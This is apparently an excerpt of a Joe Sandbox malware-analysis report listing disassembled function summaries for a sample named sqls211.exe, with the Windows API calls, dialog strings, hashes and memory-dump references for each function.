                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$CompareString
                                                                                                            • String ID:
                                                                                                            • API String ID: 3397213944-0
                                                                                                            • Opcode ID: 144ee20ec35a5efa2a38232e60ff73bf87ad946e968d2b504ecb3e9e5e830549
                                                                                                            • Instruction ID: 3f29670ca517987d33570b52eb38ec9c3ead43cd6d3289fcf1ecf6db1f3aba69
                                                                                                            • Opcode Fuzzy Hash: 144ee20ec35a5efa2a38232e60ff73bf87ad946e968d2b504ecb3e9e5e830549
                                                                                                            • Instruction Fuzzy Hash: C7F03033008094BFCF265F52EC09DCE7F26EB54770B118416F61A5B061CB72E661E6D0
                                                                                                            APIs
                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDB579
                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB58A
                                                                                                            • IsDialogMessageW.USER32(00010424,?), ref: 00CDB59E
                                                                                                            • TranslateMessage.USER32(?), ref: 00CDB5AC
                                                                                                            • DispatchMessageW.USER32(?), ref: 00CDB5B6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1266772231-0
                                                                                                            • Opcode ID: 1feca4e170516ebf112a2478fc45ee8bcfd876b6b5765fa578a6209d983b58c9
                                                                                                            • Instruction ID: 8e9f454b720d2cbc9fec9177e16d73d356d9fc0f8cab845b38da9d1ad43bb21b
                                                                                                            • Opcode Fuzzy Hash: 1feca4e170516ebf112a2478fc45ee8bcfd876b6b5765fa578a6209d983b58c9
                                                                                                            • Instruction Fuzzy Hash: 35F0BD71A0121AAB8B209FE5AD4CEEB7FACEE156917004415B519D2210EB38D606CBB4
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00CE891E
                                                                                                              • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,00CF3A34,00000000,00CF3A34,00000000,?,00CEC8BD,00CF3A34,00000007,00CF3A34,?,00CECCBA,00CF3A34), ref: 00CE8DE2
                                                                                                              • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(00CF3A34,?,00CEC896,00CF3A34,00000000,00CF3A34,00000000,?,00CEC8BD,00CF3A34,00000007,00CF3A34,?,00CECCBA,00CF3A34,00CF3A34), ref: 00CE8DF4
                                                                                                            • _free.LIBCMT ref: 00CE8930
                                                                                                            • _free.LIBCMT ref: 00CE8943
                                                                                                            • _free.LIBCMT ref: 00CE8954
                                                                                                            • _free.LIBCMT ref: 00CE8965
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 4b96daab27f3eab2e6e4730b50dcf96cab7028e22bb4a3c222693175ddcb2c52
                                                                                                            • Instruction ID: 6fe375846a9ec809a7d2ba10b99151e87068a9b93c8fa5f4a5b083538cc18722
                                                                                                            • Opcode Fuzzy Hash: 4b96daab27f3eab2e6e4730b50dcf96cab7028e22bb4a3c222693175ddcb2c52
                                                                                                            • Instruction Fuzzy Hash: 8AF0DA72810767EB87666F15FC0253D3BA2FB347253050606F518D67B2CB328A46EBA6
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _swprintf
                                                                                                            • String ID: %ls$%s: %s
                                                                                                            • API String ID: 589789837-2259941744
                                                                                                            • Opcode ID: 88cec39c72c5283f98272d626c4f5310bfb5ee1aa8a00634171d1e3466916dd4
                                                                                                            • Instruction ID: c5e3a6082581030df05f3c06fb84e5ce5b04b4cf127bc6fbaaa8cbc8ddf14a7e
                                                                                                            • Opcode Fuzzy Hash: 88cec39c72c5283f98272d626c4f5310bfb5ee1aa8a00634171d1e3466916dd4
                                                                                                            • Instruction Fuzzy Hash: C4515B31288304F6F6216A918D46F367265EB05B00F2D450BFF96A46F1D9B2E912F71B
                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\sqls211.exe,00000104), ref: 00CE7FAE
                                                                                                            • _free.LIBCMT ref: 00CE8079
                                                                                                            • _free.LIBCMT ref: 00CE8083
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$FileModuleName
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\sqls211.exe
                                                                                                            • API String ID: 2506810119-3746218536
                                                                                                            • Opcode ID: bb3d66960f4e557ee8f9543dda997f822e1c255dcefae02a8da196a28c68a318
                                                                                                            • Instruction ID: 387d927f480fabf4b5090ee5ed7348c62a5aef3065347b6474192da343cc20bc
                                                                                                            • Opcode Fuzzy Hash: bb3d66960f4e557ee8f9543dda997f822e1c255dcefae02a8da196a28c68a318
                                                                                                            • Instruction Fuzzy Hash: 9631BF71A00298AFCB21DF9ADC80DAEBBBCEF94310F104166F91897211DB718E49DB61
                                                                                                            APIs
                                                                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00CE31FB
                                                                                                            • _abort.LIBCMT ref: 00CE3306
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EncodePointer_abort
                                                                                                            • String ID: MOC$RCC
                                                                                                            • API String ID: 948111806-2084237596
                                                                                                            • Opcode ID: b1c0ce3a4a2a0c8f64c5ba89a154094c8c2bb985970091b68c34f8ba82e84911
                                                                                                            • Instruction ID: 411578fa3d324b8ffdd3ec01a599fbd5efc0feb43266d1edc032b23fd1ff5ed7
                                                                                                            • Opcode Fuzzy Hash: b1c0ce3a4a2a0c8f64c5ba89a154094c8c2bb985970091b68c34f8ba82e84911
                                                                                                            • Instruction Fuzzy Hash: 41418C71900189AFCF16DF96CC85AEEBBB5FF08304F148099FA1467262D335AA51DB50
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00CC7406
                                                                                                              • Part of subcall function 00CC3BBA: __EH_prolog.LIBCMT ref: 00CC3BBF
                                                                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00CC74CD
                                                                                                              • Part of subcall function 00CC7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CC7AAB
                                                                                                              • Part of subcall function 00CC7A9C: GetLastError.KERNEL32 ref: 00CC7AF1
                                                                                                              • Part of subcall function 00CC7A9C: CloseHandle.KERNEL32(?), ref: 00CC7B00
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                            • API String ID: 3813983858-639343689
                                                                                                            • Opcode ID: cdbef8601135558d66ecbba3687aa6aa44ed9a08f9f80a538878f5d810285b4a
                                                                                                            • Instruction ID: 188aa581e67995f5f3629511d3fa2734a79ddb100ec9c1927da82714104cd8d5
                                                                                                            • Opcode Fuzzy Hash: cdbef8601135558d66ecbba3687aa6aa44ed9a08f9f80a538878f5d810285b4a
                                                                                                            • Instruction Fuzzy Hash: F631CFB1E04248AADF11EBA4DC45FEE7BA8EF09304F04411AF955E7282CB748B45DB61
                                                                                                            APIs
                                                                                                              • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                                                                              • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                                                                            • EndDialog.USER32(?,00000001), ref: 00CDAD98
                                                                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00CDADAD
                                                                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CDADC2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemText$DialogWindow
                                                                                                            • String ID: ASKNEXTVOL
                                                                                                            • API String ID: 445417207-3402441367
                                                                                                            • Opcode ID: 082750d37196c5e1c9a37a1248e3b70c0baea4c5c18e15a37c4cd6fca316bcf7
                                                                                                            • Instruction ID: cc704650685552e3f1e95c80671eecb0c997f5ef10ed9885a3715b0a17472647
                                                                                                            • Opcode Fuzzy Hash: 082750d37196c5e1c9a37a1248e3b70c0baea4c5c18e15a37c4cd6fca316bcf7
                                                                                                            • Instruction Fuzzy Hash: C011E632244300BFD3219F68DC45F6A7B6AEF6B702F140012F340DB7A0C7619A16A736
                                                                                                            APIs
                                                                                                            • __fprintf_l.LIBCMT ref: 00CCD954
                                                                                                            • _strncpy.LIBCMT ref: 00CCD99A
                                                                                                              • Part of subcall function 00CD1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D01030,00000200,00CCD928,00000000,?,00000050,00D01030), ref: 00CD1DC4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                            • String ID: $%s$@%s
                                                                                                            • API String ID: 562999700-834177443
                                                                                                            • Opcode ID: fffb9b670144e36ad79af8796852a6b350ace242658858fe7ac7f1abb601be50
                                                                                                            • Instruction ID: 0274a518c89143970607808cef7f5028a4d4a134e9987b1d13970aef3654199f
                                                                                                            • Opcode Fuzzy Hash: fffb9b670144e36ad79af8796852a6b350ace242658858fe7ac7f1abb601be50
                                                                                                            • Instruction Fuzzy Hash: 8B21D23640024CAEDB21EEA4CC05FEE7BA8AF05304F14003AFA26961A2E732D648DB51
                                                                                                            APIs
                                                                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00CCAC5A,00000008,?,00000000,?,00CCD22D,?,00000000), ref: 00CD0E85
                                                                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00CCAC5A,00000008,?,00000000,?,00CCD22D,?,00000000), ref: 00CD0E8F
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00CCAC5A,00000008,?,00000000,?,00CCD22D,?,00000000), ref: 00CD0E9F
                                                                                                            Strings
                                                                                                            • Thread pool initialization failed., xrefs: 00CD0EB7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                            • String ID: Thread pool initialization failed.
                                                                                                            • API String ID: 3340455307-2182114853
                                                                                                            • Opcode ID: 9b6238dbc6fad679951e84627cdefe94e04754149691d4ed5aef6220b696eb7f
                                                                                                            • Instruction ID: 97ad0850874dbaa98724dc38d05bf599b53ec3004bf86be774cf0e2cab7761d1
                                                                                                            • Opcode Fuzzy Hash: 9b6238dbc6fad679951e84627cdefe94e04754149691d4ed5aef6220b696eb7f
                                                                                                            • Instruction Fuzzy Hash: 401142B1640708ABC3215F6ADD84BABFBDCEB55754F604C2FE1DA82600DA715A408B64
                                                                                                            APIs
                                                                                                              • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                                                                              • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                                                                            • EndDialog.USER32(?,00000001), ref: 00CDB2BE
                                                                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00CDB2D6
                                                                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 00CDB304
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemText$DialogWindow
                                                                                                            • String ID: GETPASSWORD1
                                                                                                            • API String ID: 445417207-3292211884
                                                                                                            • Opcode ID: 48d604af2611a5abb98cd81eb5f4ee9a982cf7e194b66ccb5869281fd459613f
                                                                                                            • Instruction ID: c7221fe594dd634d5d2a45dcb1690ea2d37d1b81955fa36b69429dd7b21a9f41
                                                                                                            • Opcode Fuzzy Hash: 48d604af2611a5abb98cd81eb5f4ee9a982cf7e194b66ccb5869281fd459613f
                                                                                                            • Instruction Fuzzy Hash: 2711E133A00219B6DB229E659D49FFF3B6DEF19710F010026FB45F2294CBA49E42A771
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                            • API String ID: 0-56093855
                                                                                                            • Opcode ID: 89fb3c0082389b842e2146e0e58348068130b5a04f0ab08ec6c6e778796e487c
                                                                                                            • Instruction ID: e9fe8f77a215942595a19e01174b8880244a9ccddcead5f9cf2163045053ea26
                                                                                                            • Opcode Fuzzy Hash: 89fb3c0082389b842e2146e0e58348068130b5a04f0ab08ec6c6e778796e487c
                                                                                                            • Instruction Fuzzy Hash: 4A015E76A04349AFDB118F55FC44AAB7BAAE708354B10442AFA4BC2331CA31D951EBB1
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 1036877536-0
                                                                                                            • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                                                                            • Instruction ID: dca5b8bada69054903b2213cd211d64a7f997d63a332122d50bb88e43033809f
                                                                                                            • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                                                                            • Instruction Fuzzy Hash: 19A17A72A007C69FEB21DF2AC8817BEBBE5EF55310F2841ADE5959B381C2388E41C751
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00CC7F69,?,?,?), ref: 00CCA3FA
                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00CC7F69,?), ref: 00CCA43E
                                                                                                            • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00CC7F69,?,?,?,?,?,?,?), ref: 00CCA4BF
                                                                                                            • CloseHandle.KERNEL32(?,?,?,00000800,?,00CC7F69,?,?,?,?,?,?,?,?,?,?), ref: 00CCA4C6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Create$CloseHandleTime
                                                                                                            • String ID:
                                                                                                            • API String ID: 2287278272-0
                                                                                                            • Opcode ID: 08874bec49adb39a966ae173e9193d0d70c43383cd723800554ec9062d185f1a
                                                                                                            • Instruction ID: b1df3c4c68b0fd447dfe45b1e300c41e6a941d0b59d2329ee5f79b29230e6cee
                                                                                                            • Opcode Fuzzy Hash: 08874bec49adb39a966ae173e9193d0d70c43383cd723800554ec9062d185f1a
                                                                                                            • Instruction Fuzzy Hash: AD41CF31248385AAD725DF24DC59FAEBBE4AB84308F08491DF5E1D3190D6A4DB48DB53
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 176396367-0
                                                                                                            • Opcode ID: bd442eda82545ee759a2abd9c7944d0f68351fbe24a826656730094eb21747e6
